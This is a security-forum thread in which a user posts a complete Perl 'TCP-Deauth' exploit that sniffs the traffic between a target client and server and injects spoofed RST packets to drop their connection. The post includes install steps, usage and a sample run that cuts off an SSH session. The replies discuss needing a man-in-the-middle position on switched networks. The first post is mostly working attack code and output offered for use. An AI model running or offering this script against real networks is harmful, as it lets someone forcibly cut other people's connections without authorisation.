Results 1 to 7 of 7

Thread: TCP-Deauth v0.4

  1. #1
    Just burned his ISO
    Join Date
    May 2010
    Posts
    4

    Default TCP-Deauth v0.4

    Hi. I write this small Perl script during my researh on the TCP/IP protocol. It disconnect a host from a server, all is in the usage.

    Code:
    #!/usr/bin/perl
    
    use Net::RawIP;
    
    print "[TCP-Deauth v0.4] Exploit by azert0x\n"."=" x 36 ."\n"; ($eth, $cip, $sip, $sport) = @ARGV;
    die "Usage: ./$0 [interface] [client ip] [server ip] [server port]\n" if @ARGV < 3;
    $n = Net::RawIP->new; print "Waiting for specified network traffic...\n";
    $p = $n->pcapinit($eth, "tcp and src host $sip and dst host $cip and dst port $sport", 1500, 30);
    loop($p, 1, \&tcprst, 0); print "> TCP-Deauth Exploit Done :)\n";
    
    sub tcprst {
      $n->bset(substr $_[2], 14); my ($cport, $ack_seq, $seq) = $n->get({tcp => [qw(source ack_seq seq)]});
      $n->set({ip => {saddr => $cip, daddr => $sip}, tcp => {source => $cport, dest => $sport, ack_seq => $ack_seq, seq => $seq, rst => 1}});
      print "Sending Spoofed RST to $sip:$sport with Acknum $ack_seq and Seqnum $seq\n"; $n->send;
      $n->set({ip => {saddr => $sip, daddr => $cip}, tcp => {source => $sport, dest => $cport, ack_seq => $ack_seq, seq => $seq, rst => 1}});
      print "Sending Spoofed RST to $cip:$cport with Acknum $ack_seq and Seqnum $seq\n"; $n->send;
    }
    
    # azert0x first sploit.
    # Thanks to Perl Underground!
    ----------------------------------

    On BackTrack4 the CPAN Perl module Net::RawIP do a segfault, so:

    $ sudo perl -MCPAN -e "install Net::RawIP"


    and after compilation and (re)installation it works great. Then, run the script as it and you'll see the usage.

    $ sudo perl deauth.pl

    My script spy the specified client and server network traffic, get the values of ack_seq & seq flags and send to the server, with them, a network packet with the RST flags activate (this RST packet masquerade as the client). If the connection is in ETABLISHED state, my script re-send another RST packet to the client (this RST packet masquerade as the server).

    You must obviously be able to sniff the traffic between the targets for my tool works (you should have understood from reading above).

    It works in various network environments, not only in localhost!
    But if you work in localhost (127.0.0.1), specify "lo" as network interface.

    For example: i've a localhost SSH server and i'm connected to it. I run my Perl script, it waits for network traffic. When i press a key on my SSH shell, i'm disconnected.

    azert0x@bt4:~$ sudo perl deauth.pl lo 127.0.0.1 127.0.0.1 22
    [TCP-Deauth v0.4] Exploit by azert0x
    ============================
    Waiting for specified network traffic...
    Sending Spoofed RST to 127.0.0.1:22 with Acknum -131693645 and Seqnum -123819417...
    Sending Spoofed RST to 127.0.0.1:60295 with Acknum -131693645 and Seqnum -123819417...
    > TCP-Deauth Exploit Done :)

    I'll update it soon, so please, if you have any problems, bugs or ideas about it, tell them to me. Then gladly i'll work on improvement.
    Last edited by azert0x; 10-15-2010 at 02:29 PM.

  2. #2
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default Re: TCP-Deauth v0.4

    One of my favourite links on the topic, may be useful to you in terms of where to go from here:

    Programming TCP Hijacking Tools in Perl

    I'd also like to see how you plan to break the TCP connection if, for example, you have server(192.168.1.1), client(192.168.1.2) and attacker(192.168.1.3), and perhaps some documentation on how/why this works, and possible workarounds for it.

    Other than that the script is cleanish and simple for anyone who wants to have a read through, with enough explanations on the datenterrorist link to get you through if you need the help.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  3. #3
    Just burned his ISO
    Join Date
    May 2010
    Posts
    4

    Default Re: TCP-Deauth v0.4

    Thanks for the link, i don't know it, and for your advices.

    Quote Originally Posted by Gitsnik View Post
    I'd also like to see how you plan to break the TCP connection if, for example, you have server(192.168.1.1), client(192.168.1.2) and attacker(192.168.1.3), and perhaps some documentation on how/why this works, and possible workarounds for it.
    My little Perl script works great in the environment that you have suggested: server(192.168.1.1), client(192.168.1.2) and attacker(192.168.1.3). Try it.

    I use Net::RawIP because it is sufficient. We need nothing more to do it. I agree with you, it's the bare minimum, but it does what i explain.

    If you want more informations or documentation, see my website.
    Last edited by azert0x; 05-14-2010 at 04:00 PM. Reason: Merging...

  4. #4
    Junior Member
    Join Date
    Apr 2010
    Location
    Sweden
    Posts
    35

    Default Re: TCP-Deauth v0.4

    From what I gather, you need to be able to sniff the traffic between the client/server in order to execute this exploit?

  5. #5
    Just burned his ISO
    Join Date
    May 2010
    Posts
    4

    Default Re : TCP-Deauth v0.4

    Yes, it's why i only used Net::RawIP, which is given with all minimal Perl installation. This increases portability.
    Last edited by azert0x; 09-05-2010 at 01:33 PM.

  6. #6
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default Re: Re : TCP-Deauth v0.4

    Quote Originally Posted by azert0x View Post
    Yes, it's why i only used Net::RawIP CPAN module, which is given with all minimal Perl installation.
    And how do you expect to get all this traffic on a switched network with only the "tcp and src $sip and dst $cip etc." filter?

    That same filter should be applied to tcpdump to see how if it works at picking up all network traffic - It does not unless I slap everything into a hub and run them from there (or MiTM the lot). This is switching-network-traffic-101. If it was as easy as firing up tcpdump we'd never have come up with the masses of MiTM tools we have.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  7. #7
    Just burned his ISO
    Join Date
    May 2010
    Posts
    4

    Default Re : TCP-Deauth v0.4

    Quote Originally Posted by Gitsnik View Post
    And how do you expect to get all this traffic on a switched network with only the "tcp and src $sip and dst $cip etc." filter?
    It is for you to do MITM attacks or "slap everything Into a hub" before using TCP-Deauth. As i said: you must obviously be able to sniff the traffic between the targets for my tool works...

    The Pcap Filter is correct and i tried it before using (you can change it if not to your liking, but you'll have to adapt the script for you).
    Last edited by azert0x; 09-05-2010 at 01:37 PM.

Similar Threads

  1. BT3 and RT73 Deauth ?
    By Halla18x in forum OLD Newbie Area
    Replies: 12
    Last Post: 11-27-2008, 07:05 PM
  2. How to deauth a client?
    By rajend3 in forum OLD Newbie Area
    Replies: 2
    Last Post: 10-05-2008, 08:40 PM
  3. help with Kismet and -deauth
    By xaser in forum OLD Newbie Area
    Replies: 6
    Last Post: 05-21-2008, 05:21 AM
  4. WEP/WPA Deauth issues
    By samsung in forum OLD BT3beta General
    Replies: 1
    Last Post: 02-09-2008, 04:17 PM
  5. Who do you DeAuth?
    By Spyder_Snyper in forum OLD Newbie Area
    Replies: 5
    Last Post: 05-13-2007, 11:10 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •